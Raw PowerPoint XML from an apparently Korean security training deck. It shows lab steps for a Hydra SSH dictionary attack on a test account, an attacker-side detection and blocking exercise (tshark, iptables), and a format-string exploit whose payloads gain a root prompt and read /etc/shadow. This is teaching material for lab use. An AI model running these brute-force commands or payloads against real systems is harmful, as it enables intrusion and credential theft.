                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBC3C99-54C1-4543-AEE4-CC09504C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0" y="864446"/>
            <a:ext cx="5019040" cy="54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01">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1EF64E-0818-4E2B-B2FB-91D8CF887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" r="-82" b="82276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561340" y="1988820"/>
            <a:ext cx="3096260" cy="17953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203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69C25BA-3706-4FD8-8E42-8515EC5CD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0" y="2838026"/>
            <a:ext cx="5019040" cy="434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851B8-522B-416D-AB73-C1FA38C7270C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1ACD0D-22AC-459D-AC25-74602AE05A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2689406-141B-46FB-832E-C29CA47A576F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FF523B-5DD7-4041-B815-DE1221EABF3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화살표: 오른쪽 12">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9587C41-E371-443D-9F1E-E8A25BC3202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55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/Training/Unit/Sys/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비인가 접근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Hydra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도구를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test01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계정을 대상으로 사전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406BD3-10D5-4A58-835B-B5C243F7EAB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B90558-D247-4439-A0AA-ADB9053034E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9C71B8-34E7-4D91-BDDD-0E3ECEB0A00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5CCB8595-4394-494E-9381-AF2CC6F7C22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6462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ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 공격 서버가 위치한 네트워크 주소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ifconfig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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 네트워크 스캔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nmap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sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10.10.1.0/24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6688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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 사전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hydra –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>wordlists/rockyou.txt ssh://10.10.1.14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획득한 계정 정보로 로그인 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err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>test01@10.10.1.14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exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 205">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641E41BC-2181-4A24-9860-CB1DE03DC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" y="1077806"/>
            <a:ext cx="4963668" cy="266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07">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD3FC64-78B4-4FEF-ADFF-317B4E74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4247726"/>
            <a:ext cx="4963668" cy="193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09">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E0EAF3-BD00-4E24-917C-541DE2C73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340" y="841586"/>
            <a:ext cx="4932299" cy="19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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9784306D-6D5E-4942-8586-70E08559B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340" y="3194366"/>
            <a:ext cx="4563491" cy="14312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B0B64-EE1D-4AE6-9057-DB2AD754F4B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5212080"/>
            <a:ext cx="5616792" cy="12769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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호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test123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5CF8C-D2CF-4B10-99AF-406051986A7F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85CB86-A337-4D4F-A0BE-94E20C0C6D0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0595E3-4650-484A-B208-5B38FDFDCD5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1BF2A5CE-73E8-43EF-83B5-8109A46E3F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705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681B9CBF-A5B3-468D-8635-097A577D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/Training/Unit/Sys/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비인가 접근 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관리자로서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서버에 원격 접속하는 사용자를 모니터링 하고자 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패킷 분석 툴을 이용하여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원격접속을 시도 중인 프로토콜과 사용자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탐지하고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공격이 의심되는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패킷 카운터 및 저장 명령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–c 200 –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 packet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.txt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패킷 확인 명령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 packet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.txt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3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iptables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 명령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iptables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-A INPUT -s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IP] -j DROP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탐지할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계정 비인가 접속을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92B200-FBE7-4D7D-A165-2493496E950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FE82343-4BBD-4E0D-B511-6DAFED75505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EFBE23-EE89-4F6E-BCBE-44800C08F93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CD8D1CB7-9FAF-4E3C-84DF-4F59D5C5344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8664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보안 로그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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 원격접속 패킷 저장 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/var/log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/secure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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 로그인 시도를 하고 있음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해당 계정의 비밀번호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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>passwd test01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무작위 공격 시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단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iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–A INPUT –s IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 213">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6AC6CE-5568-40D0-9A0E-7CBAEA27D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00" b="50518"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="1077475"/>
            <a:ext cx="4941294" cy="1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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3226F2-D95F-4C7A-A031-E5395AF94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9" y="3213138"/>
            <a:ext cx="5001641" cy="80454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217">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A4D9A2-400E-4443-9DFF-059E3D027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3" y="4521715"/>
            <a:ext cx="4954016" cy="176784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CE32E-C979-4B56-9233-FE6E734747D9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795DC3-5BD6-4250-9E45-F541B4F1992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B44DC69-D4B3-4C1D-94C7-0B323B8B215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C7967E-F168-40C2-95C6-A9174FDB608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화살표: 오른쪽 12">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99FDD40-A174-4C54-A5B9-EA0B7E1542E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24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소스 파일 및 취약한 부분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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용으로 포맷 스트링 취약점이 존재함을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이면 루트 권한 쉘을 얻을 수 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ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 취약한 부분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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDDCC5-5EEB-4A7D-AA72-66E76071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3" y="1308062"/>
            <a:ext cx="4970272" cy="264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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727F43-D33E-4A48-AFB1-B318A79B8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899" y="481127"/>
            <a:ext cx="4970399" cy="270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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4965C47-8AF6-484B-821C-5976345E9E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2" r="353"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315590" y="4046737"/>
            <a:ext cx="4927016" cy="23301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7926C61-9E1E-4777-994E-4F5F1EC49A69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A17BFBF-D277-49BF-B430-F2777E6795B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B7A638-DE67-4E43-95C5-A739AF785E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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D599F49F-7046-45AA-BD96-2B22441FED32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41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pass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변수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>주소는 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</a:rPr>
              <a:t>0xbfffead0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을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변수의 주소는 일부 변경될 수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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 준비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  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"\xd0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>\xea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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x“’)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%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0xbfffeaa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임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명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자 길이에 따라 변경될 수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A0EFEB4-AA1E-4B58-9FBC-FD9B7F5B1480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497191" y="442099"/>
          <a:ext cx="4009639" cy="4624509"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4009639">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3874176564"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20016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648" marR="52648" marT="14556" marB="145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40343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="41511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시점에서의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648" marR="52648" marT="14556" marB="145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99081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63489" name="_x617086112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D643E2-0914-4348-BAF3-4D3A333D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r="492" b="3080"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682117" y="914402"/>
            <a:ext cx="3221974" cy="40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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908F26EA-D7C6-4555-AAE7-A403C0950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1" y="5536756"/>
            <a:ext cx="4935093" cy="65392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B1E0E57-DBFB-4883-AA1C-049CABDDFC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6269429" y="442099"/>
          <a:ext cx="4932807" cy="415023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594700888"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23050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7818"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="38819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863989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63491" name="_x617765528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918F0D9E-653E-406B-BAF4-FA91A13F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44" y="954128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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408F8867-D6D3-4DBD-92F8-8F6CBA583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" t="4059" r="833" b="3893"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6269429" y="5343526"/>
            <a:ext cx="4868292" cy="695326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241CCE8-76BE-4F5B-889A-050E4701A33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0E93B51-CF56-4750-98D0-70C1025A44C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599C1-851B-4787-9600-E3DC3DBC7C8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B2C25089-473D-40C3-B5BF-1942574A072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3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97A156-4D8D-4AC0-A570-59C6AB5495DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="487602" y="437382"/>
          <a:ext cx="5381390" cy="4204921"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5381390">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3880889392"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="163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8682"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3974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argv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[1]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포함된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%08x’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의해 스택의 값을 하나씩 읽어온다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119481"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66562" name="_x617086400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2B15A9-8D12-412B-A71B-F57674F3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54" y="975147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1" name="_x617086688">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07057C53-AA77-404F-B1EB-DB62815F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" y="975147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601F245-3D40-4C1F-8FEB-C8D2C9432FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6284887" y="437382"/>
          <a:ext cx="5381390" cy="4204921"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5381390">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3880889392"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="163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8682"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3974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119481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E72B75-F2C4-448D-BB0F-ED714C8CB171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B5FB524-2A7F-4EA0-AA86-4829FA74F8FB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555452-6A6E-4A35-B29D-DBEA707C16A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4800FF3A-194C-4235-B77E-3DA1AA34F8F0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530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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 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"\xa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>\xea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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08n“’)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76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 변경됨을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2C54A-5F0A-496C-967B-013EAF2B9B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="488831" y="475102"/>
          <a:ext cx="5379232" cy="4158107"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5379232">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254709107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660690"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39118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4917"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67585" name="_x618891432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDE8608-6A28-4B63-89D9-FDF1DFFE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8" y="993484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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D4CBBE-FD7A-4F02-AAEB-6ADC28FB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1" y="5331422"/>
            <a:ext cx="4982591" cy="7230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3B88285-BDAF-4E0F-89EA-AE93331359EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="481834"/>
          <a:ext cx="5386032" cy="4164940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5386032">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3481946896"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2326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66711"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="391868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939432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67587" name="_x1659517408">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DFB036-1896-41D8-BB25-802AF97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52" y="993484"/>
            <a:ext cx="4803775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1194799-3A69-459C-ABC8-68487908CD1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A1DF76D-94BA-492B-9E57-8024F5DDB660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E11494-B135-45A7-87B3-4C2FAEEA43B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화살표: 오른쪽 12">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82DA6DB-0E65-49C8-98C9-59EA09BFA45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3309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7)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가 되도록 공격 및 루트 권한으로 실행할 명령 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>입력창</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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"\xa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>\xea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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%76x.%08n“’)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로 변경되어 루트 권한으로 명령을 실행시킬 수 있는 프롬프트가 등장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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 권한이 필요한 명령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/>
              <a:t>cat /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6589769-D3DB-461C-9422-07580D150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782" b="9246"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479404" y="1085425"/>
            <a:ext cx="5442227" cy="131899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4B83F5-6C76-4AE9-A33C-D8DEA8F451B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="462566"/>
          <a:ext cx="5352566" cy="4151376"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5352566">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="56090381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66905"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39051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62474"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
